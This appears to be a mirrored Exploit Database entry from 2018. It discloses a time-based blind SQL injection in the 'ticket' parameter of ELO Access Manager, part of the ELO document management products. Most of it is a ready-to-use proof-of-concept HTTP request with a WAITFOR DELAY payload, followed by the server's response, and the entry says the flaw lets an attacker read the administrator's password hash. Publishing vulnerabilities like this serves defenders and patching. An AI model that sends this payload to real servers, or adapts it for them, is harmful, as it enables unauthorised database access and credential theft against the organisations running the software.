Elektronischer Leitz-Ordner 10 – SQL Injection

• Exploit Database
• 47 阅读

• 作者： Jens Regel
  日期： 2018-07-10
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/44999/

• # Title: Elektronischer Leitz-Ordner 10 - SQL Injection
  # Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
  # Software: https://www.elo.com/en-de/
  # CVE: N/A
  # Affected Products:
  # ELOenterprise 10 (ELO Access Manager <= 10.17.120)
  # ELOenterprise 9 (ELO Access Manager <= 9.17.120)
  # ELOprofessional 10 (ELO Access Manager <= 10.17.120)
  # ELOprofessional 9 (ELO Access Manager <= 9.17.120)
  
  
  
  # Description: 
  # ELO is a commercial software product for managing documents and
  # electronic content. Storage and organization is similar to classic
  # paper-based document management. ELO belongs to the category of document
  # management (DMS) and enterprise content management systems (ECM). DMS
  # and ECM systems enable audit-proof archiving of documents and
  # information requiring storage.
  
  # We have discovered a time-based blind SQL injection vulnerability in the
  # ELO Access Manager (<= 9.17.120 and <= 10.17.120) component that makes
  # it possible to read all database content. The vulnerability exists in
  # the HTTP GET parameter "ticket". For example, we succeeded in reading
  # the password hash of the administrator user in the "userdata" table from
  # the "eloam" database.
  
  # Proof of Concept:
  
  GET
  /wf-NAME/social/api/feed/aggregation/201803310000?ticket=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
  IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS
  NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN
  (SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY
  name),5,1))>104) WAITFOR DELAY '0:0:1'--
  qvAV&after=1523013041889&lang=de&_dc=1523013101769 HTTP/1.1
  Accept-Encoding: gzip,deflate
  Connection: close
  Accept: */*
  Host: server:9090
  Referer: http://server:9090/wf-NAME/social/api/feed/aggregation/201803310000
  Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv: 59.0) Gecko/20100101
  Firefox/59.0
  
  HTTP/1.1 401 Unauthorized
  Server: Apache-Coyote/1.1
  Content-Type: application/json;charset=UTF-8
  Content-Length: 410
  Date: Fri, 06 Apr 2018 11:57:15 GMT
  Connection: close
  
  {"error":{"code":401,"message":"[TICKET:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\u0027
  IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS
  NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN
  (SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY
  name),5,1))\u003e104) WAITFOR DELAY \u00270][ELOIX:2001]Sitzungskennung
  ung..ltig oder abgelaufen. Melden Sie sich neu an.[NO-DETAILS]"}}